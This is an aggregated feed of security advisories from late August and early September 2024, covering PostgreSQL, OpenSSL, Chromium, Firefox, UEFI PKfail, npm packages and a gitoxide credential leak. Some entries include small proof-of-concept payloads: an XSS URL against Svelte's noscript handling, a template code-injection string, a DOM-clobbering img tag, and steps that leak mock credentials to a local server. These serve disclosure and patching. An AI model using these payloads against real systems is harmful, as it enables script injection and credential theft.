29.08.2024 16:44:43	almalinux	[ALSA-2024:6020] postgresql:15 security update (important)	postgresql:15 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6020
29.08.2024 03:00:00	debian	[DSA-5760-1] ghostscript (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5760-1
29.08.2024 11:25:04	almalinux	[ALSA-2024:5941] libvpx security update (moderate)	libvpx security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5941
29.08.2024 11:29:21	almalinux	[ALSA-2024:5962] python39:3.9 and python39-devel:3.9 security update (moderate)	python39:3.9 and python39-devel:3.9 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5962
29.08.2024 03:00:00	freebsd	[FREEBSD:6F2545BB-65E8-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixes (high)	Chrome Releases reports: This update includes 4 security fixes: [351865302] High CVE-2024-7969: Type Confusion in V8. Reported by CFF of Topsec Alpha Team on 2024-07-09 [360265320] High CVE-2024-8193: Heap buffer overflow in Skia. Reported by Renan Rios (@hyhy_100) on 2024-08-16 [360533914] High CVE-2024-8194: Type Confusion in V8. Reported by Seunghyun Lee (@0x10n) on 2024-08-18 [360758697] High CVE-2024-8198: Heap buffer overflow in Skia. Reported by Renan Rios (@hyhy_100) on 2024-08-19	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:6F2545BB-65E8-11EF-8A0F-A8A1599412C6
30.08.2024 23:01:24	npm	[NPM:GHSA-8266-84WP-WV5C] Svelte has a potential mXSS vulnerability due to improper HTML escaping (moderate)	### SummaryA potential XSS vulnerability exists in Svelte for versions prior to 4.2.19.### DetailsSvelte improperly escapes HTML on server-side rendering. It converts strings according to the following rules:- If the string is an attribute value: - `"` -> `"` - `&` -> `&` - Other characters -> No conversion- Otherwise: - `<` -> `<` - `&` -> `&` - Other characters -> No conversionThe assumption is that attributes will always stay as such, but in some situation the final DOM tree rendered on browsers is different from what Svelte expects on server-side rendering. This may be leveraged to perform XSS attacks. More specifically, this can occur when injecting malicious content into an attribute within a `<noscript>` tag.### PoCA vulnerable page (`+page.svelte`):```html<script>import { page } from "$app/stores"// user inputlet href = $page.url.searchParams.get("href") ?? "https://example.com";</script><noscript> <a href={href}>test</a></noscript>```If a user accesses the following URL,```http://localhost:4173/?href=</noscript><script>alert(123)</script>```then, `alert(123)` will be executed.### ImpactXSS, when using an attribute within a noscript tag	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8266-84WP-WV5C
30.08.2024 16:58:10	cert	[VU:455367] Insecure Platform Key (PK) used in UEFI system firmware signature	### OverviewA vulnerability in the user of hard-coded Platform Keys (PK) within the UEFI framework, known as PKfail, has been discovered. This flaw allows attackers to bypass critical UEFI security mechanisms like Secure Boot, compromising the trust between the platform owner and firmware and enabling manipulation of sensitive system settings.### DescriptionThe UEFI standard establishes trust relationships using Public Key Infrastructure (PKI) between the platform owner, the platform firmware, and the operating system. Central to this process is the Platform Key (PK), which is designed to secure the connection between the platform owner and the platform firmware. > The platform owner enrolls the public half of the key (PKpub) into the platform firmware. The platform owner can later use the private half of the key (PKpriv) to change platform ownership or to enroll a Key Exchange Key. For UEFI, the recommended Platform Key format is RSA-2048.(Section 7.2.1 of the UEFI 2.3.1 Errata C standard)The PKFail vulnerability highlights a critical flaw in the UEFI ecosystem. While the Platform Key is expected to originate from the Original Equipment Manufacturer (OEM) using a secure hardware security module (HSM), in practice, much of the UEFI software and drivers are developed by a complex network of supply-chain partners and Independent BIOS Vendors (IBVs). These components are often shared across multiple OEMs. In some cases, temporary test software keys, or "softkeys," which are hard-coded for ease of build and testing, inadvertently make their way into production firmware.These softkeys, intended solely for compatibility testing and performance evaluation, are supposed to be untrusted and restricted in their usage. The current UEFI's key verification process is limited - it only checks against the keys in the local database, with no verification against the root Certificate Authority (CA) or special validation of extended attributes. Although keys cannot be self-signed, the lack of stringent verification allows these untrusted keys to be mistakenly included in production firmware. Recent audits have uncovered that many OEM devices shipped with hard-coded, untrusted keys in their production UEFI firmware. Despite these keys often having attributes like "DO NOT TRUST," there is no programmatic safeguard or other validations (say attribute-based) to prevent their inclusion in final products. The compromise or leak of these private keys could have bad consequences, allowing attackers to sign malicious modules that execute with high privileges during the boot process, even if Secure Boot is enabled. This undermines the very purpose of signed software verification, leaving systems vulnerable to untrusted and malicious modules.Compounding the issue, UEFI firmware is largely invisible to most Endpoint Detection and Response (EDR) software, making it difficult to audit and detect the use of compromised keys. Moreover, many UEFI implementations lack Remote Measurement or Auditing capabilities that could dynamically check the integrity of the key database via network resources. ### ImpactAn attacker with access to an undesired-yet-trusted test Platform Key's private portion can exploit it to sign malicious UEFI software, enabling the execution of code with the highest privileges during the early boot phases of a UEFI Secure Boot-protected system. A successful attack could lead to the following impacts:* Invalidation or bypass of UEFI security features like SecureBoot.* Installation of persistent software that cannot be easily detected or erased, that can also persist across reboots and potentially surviving OS reinstalls.* Creation of backdoors and back communications channels to exfiltrate sensitive data.* Interruption of system execution leading to device damage or permanent shutdown.### Solution* Update UEFI Firmware: Ensure you install the latest stable version of UEFI firmware provided by your PC vendor or the reseller of your computing environment. Refer to the Vendor Information section below for specific resources and updates from vendors addressing these vulnerabilities.* Use Researcher Tools for Impact Assessment: Utilize [tools and information](https://github.com/binarly-io/Vulnerability-REsearch/blob/main/PKfail/BRLY-2024-005.md) provided by Binarly to assess the impact of untrusted Platform Keys on your systems. These resources can help you conduct a thorough analysis of affected systems.* Leverage Automatic Firmware Updates: If your operating system supports automatic or managed firmware updates (e.g., Linux Vendor Firmware Service, LVFS), regularly check for updates using `fwupdmgr get-updates` and apply them with `fwupdmgr update` or use [Windows OEM supported mechanisms](https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/windows-uefi-firmware-update-platform) as appropriate. Keeping your firmware up to date is crucial in mitigating the risks associated with PKfail.### AcknowledgementsThanks to [Binarly](https://www.binarly.io/blog/pkfail-untrusted-platform-keys-undermine-secure-boot-on-uefi-ecosystem) for disclosing this vulnerability. This document was written by Vijay Sarvepalli.	https://secdb.nttzen.cloud/security-advisory/cert/VU:455367
30.08.2024 05:07:09	fedora	[FEDORA-2024-5361efb19a] Fedora 40: python3.13	Security fix for CVE-2024-8088	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5361efb19a
30.08.2024 03:00:00	debian	[DSA-5762-1] webkit2gtk (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5762-1
30.08.2024 03:00:00	debian	[DSA-5763-1] pymatgen (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5763-1
30.08.2024 03:00:00	oraclelinux	[ELSA-2024-6000] postgresql:12 security update (important)	pgauditpg_repackpostgres-decoderbufspostgresql[12.20-1]- Update to 12.20- Fix CVE-2024-7348	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6000
30.08.2024 03:00:00	oraclelinux	[ELSA-2024-6001] postgresql:15 security update (important)	pgauditpg_repackpostgres-decoderbufspostgresql[15.8-1]- Update to 15.8- Fix CVE-2024-7348	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6001
30.08.2024 03:00:00	oraclelinux	[ELSA-2024-6018] postgresql:13 security update (important)	pgauditpg_repackpostgres-decoderbufspostgresql[13.16-1]- Update to 13.16- Fix CVE-2024-7348	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6018
30.08.2024 03:00:00	oraclelinux	[ELSA-2024-6020] postgresql:15 security update (important)	pgaudit[1.7.0-1]- Initial import for postgresql 15 module- Update to 1.7.0- Support postgresql 15- Related: #2128410pg_repackpostgres-decoderbufs[1.9.7-1.Final]- Iitial import for postgresql 15 stream- Related: #2128410postgresql[15.8-1]- Update to 15.8[15.6-3]- Remove /var/run/postgresql- Related: RHEL-51271[15.6-2]- Enable lz4 and zstd support[15.6-1]- Update to 15.6 and 13.14- Fix CVE-2024-0985[15.5-1]- update to 15.5- Fixes CVE-2023-5868, CVE-2023-5869, CVE-2023-5870, CVE-2023-39417, and CVE-2023-39418[15.3-1]- update to 15.3- Fixes CVE-2023-2454 and CVE-2023-2455 Resolves: #2214875[15.2-1]- update to 15.2- Resolves: #2128410[15.0-2]- update postgresql-setup to 8.8[15.0-1]- Initial import for postgresql 15- Resolves: #2128410	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6020
30.08.2024 15:36:27	almalinux	[ALSA-2024:5927] postgresql:16 security update (important)	postgresql:16 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5927
31.08.2024 21:34:53	slackware	[SSA:2024-244-01] libpcap	New libpcap packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libpcap-1.10.5-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Clean up sock_initaddress() and its callers to avoid double frees in some cases. Fix pcap_findalldevs_ex() not to crash if passed a file:// URL with a path to a directory that cannot be opened. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-7256 https://www.cve.org/CVERecord?id=CVE-2024-8006 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libpcap-1.10.5-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libpcap-1.10.5-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpcap-1.10.5-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpcap-1.10.5-x86_64-1.txzMD5 signaturesSlackware 15.0 package:293031b602d63cc1d28a4bf833d15a29 libpcap-1.10.5-i586-1_slack15.0.txzSlackware x86_64 15.0 package:bc1f59d938e9b707c84ec26bbe33940a libpcap-1.10.5-x86_64-1_slack15.0.txzSlackware -current package:a52f1a8064892102cb7b5038c00ff35b l/libpcap-1.10.5-i686-1.txzSlackware x86_64 -current package:d789bc6867690cb1ab76212e68a0c159 l/libpcap-1.10.5-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libpcap-1.10.5-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-244-01
01.09.2024 19:42:16	rustsec	[RUSTSEC-2024-0367] gix-path uses local config across repos when it is the highest scope	### Summary`gix-path` executes `git` to find the path of a configuration file that belongs to the `git` installation itself, but mistakenly treats the local repository's configuration as system-wide if no higher scoped configuration is found. In rare cases, this causes a less trusted repository to be treated as more trusted, or leaks sensitive information from one repository to another, such as sending credentials to another repository's remote.### DetailsIn `gix_path::env`, the underlying implementation of the `installation_config` and `installation_config_prefix` functions calls `git config -l --show-origin` and parses the first line of the output to extract the path to the configuration file holding the configuration variable of highest [scope](https://git-scm.com/docs/git-config#SCOPES):https://github.com/Byron/gitoxide/blob/12251eb052df30105538fa831e641eea557f13d8/gix-path/src/env/git/mod.rs#L91https://github.com/Byron/gitoxide/blob/12251eb052df30105538fa831e641eea557f13d8/gix-path/src/env/git/mod.rs#L112While the configuration variable of highest scope is not usually in the local scope, there are practical situations where this occurs:- A configuration file truly associated with the installation is not present on all systems and can occasionally be empty. Likewise, there may be no variables in the global scope.- Configuration files associated with those higher scopes may be deliberately skipped by setting the `GIT_CONFIG_SYSTEM` and `GIT_CONFIG_GLOBAL` environment variables to `/dev/null` (or to `NUL` on Windows). This prevents `gix-path` from finding the path of configuration files for those scopes, while not preventing downstream components such as the function in `gix-config` from reporting a local path as being associated with the installation.- The `GIT_CONFIG_NOSYSTEM` environment variable can be used to disable configuration associated with the installation. (`GIT_CONFIG_NOSYSTEM=1` is more powerful than `GIT_CONFIG_SYSTEM=/dev/null` on systems where an additional "unknown" scope is associated with the installation, as occurs on macOS with Apple Git.) This will cause the local scope to be the highest nonempty scope under even more situations, though in practice it is less dangerous because most, though possibly not all, downstream components would disregard the value.A user may use either or both of the latter two techniques to turn off an undesired configuration or to create a more replicable environment. Such a user would expect that this results in a more controlled configuration.Often, when located inside one repository, a user performs operations on that repository or that are not specific to any repository. In such use, local configuration is typically desired or at least acceptable, and mistaking it as coming from another scope is not typically harmful.However, sometimes a user is in one repository and operates on another repository. A major case where this occurs is cloning one repository while located in another. This can be done in an ad-hoc fashion, including when cloning the repository outside of the one we are inside. It may also potentially be automated by an application for purposes such as submodule handling. Two kinds of problems are anticipated:- A less secure configuration may be set for a specific repository where it is judged acceptable, even though it would not be wanted for other repositories, such as to enable a protocol or set up debugging.- More likely, a configuration that supplies secrets for use in one repository's remote can be used to send those secrets to another repository's remote.### PoCIn this example, we send mock `Authorization: Basic ...` credentials meant for one repository's remote to another remote, by running `gix` while inside the first repository to clone the second repository.These instructions are written for a Unix shell, but they will work in other shells, including in PowerShell on Windows if the method of setting environment variables is adapted and `/dev/null` is replaced with `NUL`. This procedure is likely to demonstrate the problem on all systems except macOS. This is due to the high-scoped "unknown" configuration that usually accompanies Apple Git, and reflects that gix-path is in practice much less vulnerable on macOS (though still potentially vulnerable).1. Install [`dummyhttp`](https://crates.io/crates/dummyhttp) to serve as a local HTTP server for the demonstration.2. Obtain a build of `gitoxide` with the `max` feature set enabled. While this vulnerability affects other builds, this example requires `max` for `http.extraHeader` support. Running `cargo install gitoxide` will install such a build though it may build against a patched version of `gix-path`. Cloning the repository ([`12251eb`](https://github.com/Byron/gitoxide/commit/12251eb052df30105538fa831e641eea557f13d8) and earlier are affected) and building with `cargo build` or `cargo install --path .` are also sufficient. In contrast, installing from published binaries with `binstall` or `quickinstall` does not provide the `max` feature, as of this writing.3. Run: `dummyhttp -i 127.0.0.1 -c 403 -v`4. In a separate terminal, create a new local repository and set up a mock remote and `http.extraHeader` configuration: ```sh git init myrepo cd myrepo git remote add origin http://127.0.0.1:8080/mygit.git git config --local http.extraHeader 'Authorization: Basic abcde' ```5. Make sure the testing setup is working by running `gix fetch` in the repository and checking that it fails in the expected way. In the terminal where that is run, a message should be shown indicating an HTTP 403 error. The more interesting output is in the terminal where `dummyhttp` is running, which should look like this: ```text 2024-30-30 03:30:16 127.0.0.1:55689 GET /myrepo.git/info/refs?service=git-upload-pack HTTP/1.1 ┌─Incoming request │ GET /myrepo.git/info/refs?service=git-upload-pack HTTP/1.1 │ Accept: / │ Authorization: Basic abcde │ Git-Protocol: version=2 │ Host: 127.0.0.1:8080 │ User-Agent: git/oxide-0.42.2 ┌─Outgoing response │ HTTP/1.1 403 Forbidden │ Content-Length: 9 │ Content-Type: text/plain; charset=utf-8 │ Date: Fri, 30 Aug 2024 03:30:16 -0400 ``` Some details may differ, especially dates and times. But `Authorization: Basic abcde` should be shown.6. Now, in the terminal where you ran `gix fetch`, try cloning a separate repository: ```sh gix clone http://127.0.0.1:8080/other.git ``` Check the output appended in the terminal where `dummyhttp` is running. This is to observe that `Authorization: Basic abcde` was rightly not sent. Alternatively, if it does appear, then your system may be in one of the uncommon configurations that is vulnerable without further action.7. Now rerun that command, but with a modified environment, to cause `gix-path` to wrongly treat configuration from the local scope as being associated with the `git` installation: ```sh env GIT_CONFIG_SYSTEM=/dev/null GIT_CONFIG_GLOBAL=/dev/null gix clone http://127.0.0.1:8080/other.git ``` Check the output appended in the terminal where `dummyhttp` is running. Observe that `Authorization: Basic abcde` was wrongly sent.While this procedure uses the same remote host for both repositories, this is not a required element. If the second repository had a different, untrusted host, the extra header would still be sent.### ImpactIt is believed to be very difficult to exploit this vulnerability deliberately, due to the need either to anticipate a situation in which higher-scoped configuration variables would be absent, or to arrange for this to happen. Although any operating system may be affected, users running Apple Git on macOS are much less likely to be affected.In the example shown above, more secure general practices would avoid it: using a credential manager, or even using `http.<url>.extraHeader` with as specific a `<url>` as possible, rather than the more general `http.extraHeader`. Many scenarios are analogous: if each repository's configuration is as secure as possible for how the repository is used, and secrets are stored securely and separately, then the circumstances under which an unacceptably unsecure configuration is used, or under which a leak of credentials would occur, become unlikely.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0367
04.09.2024 00:57:41	maven	[MAVEN:GHSA-8WM9-24QG-M5QJ] Keycloak has a brute force login protection bypass (moderate)	A vulnerability was found in Keycloak. This flaw allows attackers to bypass brute force protection by exploiting the timing of login attempts. By initiating multiple login requests simultaneously, attackers can exceed the configured limits for failed attempts before the system locks them out. This timing loophole enables attackers to make more guesses at passwords than intended, potentially compromising account security on affected systems.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8WM9-24QG-M5QJ
04.09.2024 00:15:50	slackware	[SSA:2024-247-02] seamonkey	New seamonkey packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/seamonkey-2.53.19-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.seamonkey-project.org/releases/seamonkey2.53.19 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/seamonkey-2.53.19-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/seamonkey-2.53.19-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.53.19-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.53.19-x86_64-1.txzMD5 signaturesSlackware 15.0 package:75c0ed299f27b64251ed725ef23da40c seamonkey-2.53.19-i686-1_slack15.0.txzSlackware x86_64 15.0 package:fc8c3a1d94ea6d5050eea997ee495f02 seamonkey-2.53.19-x86_64-1_slack15.0.txzSlackware -current package:46a63968b7230033aa7a9be6b26374ec xap/seamonkey-2.53.19-i686-1.txzSlackware x86_64 -current package:18d1e3b43dbdc8b3d606b54535173197 xap/seamonkey-2.53.19-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg seamonkey-2.53.19-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-247-02
04.09.2024 00:15:31	slackware	[SSA:2024-247-01] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.15.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.15.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-41/ https://www.cve.org/CVERecord?id=CVE-2024-8381 https://www.cve.org/CVERecord?id=CVE-2024-8382 https://www.cve.org/CVERecord?id=CVE-2024-8383 https://www.cve.org/CVERecord?id=CVE-2024-8384 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.15.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.15.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.2.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.2.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:3d1a29eed6f7c60e5bb550fdd10ca16b mozilla-firefox-115.15.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:b04f5c98c20a175659230ebdda2a05ff mozilla-firefox-115.15.0esr-x86_64-1_slack15.0.txzSlackware -current package:869213a24c8ceafa0721a2682f1fc545 xap/mozilla-firefox-128.2.0esr-i686-1.txzSlackware x86_64 -current package:c6fc4edb88056dfe587612a8fa0469f3 xap/mozilla-firefox-128.2.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.15.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-247-01
03.09.2024 23:08:31	npm	[NPM:GHSA-6Q32-HQ47-5QQ3] @actions/artifact has an Arbitrary File Write via artifact extraction (high)	### ImpactVersions of `actions/artifact` before 2.1.7 are vulnerable to arbitrary file write when using `downloadArtifactInternal`, `downloadArtifactPublic`, or `streamExtractExternal` for extracting a specifically crafted artifact that contains path traversal filenames.### PatchesUpgrade to version 2.1.7 or higher. ### References- https://snyk.io/research/zip-slip-vulnerability- https://github.com/actions/toolkit/pull/1724### CVECVE-2024-42471### CreditsJustin Taft from Google	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6Q32-HQ47-5QQ3
04.09.2024 00:45:33	npm	[NPM:GHSA-Q765-WM9J-66QJ] @blakeembrey/template vulnerable to code injection when attacker controls template input (high)	### ImpactIt is possible to inject and run code within the template if the attacker has access to write the template name.```jsconst { template } = require('@blakeembrey/template');template("Hello {{name}}!", "exploit() {} && ((()=>{ console.log('success'); })()) && function pwned");```### PatchesUpgrade to 1.2.0.### WorkaroundsDon't pass untrusted input as the template display name, or don't use the display name feature.### ReferencesFixed by removing in https://github.com/blakeembrey/js-template/commit/b8d9aa999e464816c6cfb14acd1ad0f5d1e335aa.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-Q765-WM9J-66QJ
04.09.2024 03:40:40	npm	[NPM:GHSA-4QRM-9H4R-V2FX] Tina search token leak via lock file in TinaCMS (high)	### ImpactTina search token leaked via lock file (tina-lock.json) in TinaCMS. Sites building with @tinacms/cli < 1.6.2 that use a search token are impacted.If your Tina-enabled website has search setup, you should rotate that key immediately.### PatchesThis issue has been patched in @tinacms/cli@1.6.2### WorkaroundsUpgrading, and rotating search token is required for the proper fix.### Referenceshttps://github.com/tinacms/tinacms/pull/4758	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4QRM-9H4R-V2FX
04.09.2024 00:45:33	npm	[NPM:GHSA-GPRJ-6M2F-J9HX] DOM clobbering could escalate to Cross-site Scripting (XSS) (moderate)	Pagefind initializes its dynamic JavaScript and WebAssembly files relative to the location of the first script you load. This information is gathered by looking up the value of `document.currentScript.src`.It is possible to "clobber" this lookup with otherwise benign HTML on the page, for example:```html<img name="currentScript" src="blob:https://xxx.xxx.xxx/ui.js"></img>```This will cause `document.currentScript.src` to resolve as an external domain, which will then be used by Pagefind to load dependencies.This exploit would only work in the case that an attacker could inject HTML to your live, hosted, website. In these cases, this would act as a way to escalate the privilege available to an attacker. This assumes they have the ability to add some elements to the page (for example, `img` tags with a `name` attribute), but not others, as adding a `script` to the page would itself be the XSS vector.Pagefind has tightened this resolution by ensuring the source is loaded from a valid script element. There are no reports of this being exploited in the wild via Pagefind.### Original ReportIf an attacker can inject benign html, such as:`<img name="currentScript" src="blob:https://xxx.xxx.xxx/ui.js"></img>`they can clobber `document.currentScript.src` leading to XSS in your library.Here is the same attack on webpack that was accepted: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GPRJ-6M2F-J9HX
03.09.2024 19:36:41	ubuntu	[USN-6987-1] Django vulnerabilities	Several security issues were fixed in Django.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6987-1
03.09.2024 19:15:07	alpinelinux	[ALPINE:CVE-2024-6119] openssl vulnerability (high)	[From CVE-2024-6119] Issue summary: Applications performing certificate name checks (e.g., TLSclients checking server certificates) may attempt to read an invalid memoryaddress resulting in abnormal termination of the application process.Impact summary: Abnormal termination of an application can a cause a denial ofservice.Applications performing certificate name checks (e.g., TLS clients checkingserver certificates) may attempt to read an invalid memory address whencomparing the expected name with an `otherName` subject alternative name of anX.509 certificate. This may result in an exception that terminates theapplication program.Note that basic certificate chain validation (signatures, dates, ...) is notaffected, the denial of service can occur only when the application alsospecifies an expected DNS name, Email address or IP address.TLS servers rarely solicit client certificates, and even when they do, theygenerally don't perform a name check against a reference identifier (expectedidentity), but rather extract the presented identity after checking thecertificate chain. So TLS servers are generally not affected and the severityof the issue is Moderate.The FIPS modules in 3.3, 3.2, 3.1 and 3.0 are not affected by this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-6119
03.09.2024 18:12:58	ubuntu	[USN-6981-2] Drupal vulnerabilities	Drupal could be made to crash or run programs if it receivedspecially crafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6981-2
03.09.2024 17:33:38	ubuntu	[USN-6986-1] OpenSSL vulnerability	OpenSSL could be made to crash or expose sensitive informationif it received a specially crafted certificate.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6986-1
03.09.2024 08:51:37	fedora	[FEDORA-2024-7b8a05a5d1] Fedora 40: flatpak (critical)	Update to 1.15.10 (CVE-2024-42472)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7b8a05a5d1
03.09.2024 08:51:32	fedora	[FEDORA-2024-afba3b5902] Fedora 40: python3.12	Security fix for CVE-2024-8088	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-afba3b5902
03.09.2024 16:11:49	almalinux	[ALSA-2024:6148] nodejs:18 security update (moderate)	nodejs:18 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6148
03.09.2024 16:27:19	almalinux	[ALSA-2024:6162] python-urllib3 security update (moderate)	python-urllib3 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6162
03.09.2024 16:09:23	almalinux	[ALSA-2024:6147] nodejs:18 security update (moderate)	nodejs:18 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6147
03.09.2024 16:25:37	almalinux	[ALSA-2024:6187] gvisor-tap-vsock security update (moderate)	gvisor-tap-vsock security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6187
03.09.2024 16:22:47	almalinux	[ALSA-2024:6195] skopeo security update (moderate)	skopeo security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6195
03.09.2024 10:39:18	almalinux	[ALSA-2024:6146] python3.12 security update (moderate)	python3.12 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6146
03.09.2024 16:24:13	almalinux	[ALSA-2024:6189] buildah security update (moderate)	buildah security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6189
03.09.2024 03:00:00	cisa	[CISA-2024:0903] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (high)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0903
03.09.2024 03:00:00	debian	[DSA-5764-1] openssl (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5764-1
03.09.2024 03:00:00	freebsd	[FREEBSD:21F505F4-6A1C-11EF-B611-84A93843EB75] OpenSSL -- Multiple vulnerabilities (critical)	The OpenSSL project reports: Possible denial of service in X.509 name checks [Moderate severity] Applications performing certificate name checks (e.g., TLS clients checking server certificates) may attempt to read an invalid memory address resulting in abnormal termination of the application process. SSL_select_next_proto buffer overread [Low severity] Calling the OpenSSL API function SSL_select_next_proto with an empty supported client protocols buffer may cause a crash or memory contents to be sent to the peer.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:21F505F4-6A1C-11EF-B611-84A93843EB75
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-5999] postgresql security update (important)	[13.16-1.0.1]- Remove non ASCII character from changelog date[13.16-1]- Update to 13.16[13.14-2]- Remove /var/run/postgresql- Related: RHEL-25756[13.14-1]- Update to 13.14- Fix CVE-2024-0985[13.13-1]- Update to 13.13- Fixes CVE-2023-5868, CVE-2023-5869, CVE-2023-5870, and CVE-2023-39417- Resolves: RHEL-5567[13.11-1]- Update to 13.11- Resolves: #2207935* Tue Feb 28 2023 Filip Janus <fjanus@redhat.com> - 13.10-1- Update to 13.10- Resolves: #2114734	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-5999
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6146] python3.12 security update (moderate)	[3.12.1-4.3]- Security fix for CVE-2024-8088Resolves: RHEL-55964[3.12.1-4.2]- Security fix for CVE-2024-6923Resolves: RHEL-53087	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6146
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6162] python-urllib3 security update (moderate)	[1.26.5-5.1]- Security fix for CVE-2024-37891- Backport upstream patch to fix TypeError for http connection if the PoolManager- is instantiated with server_hostnameResolves: RHEL-49853	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6162
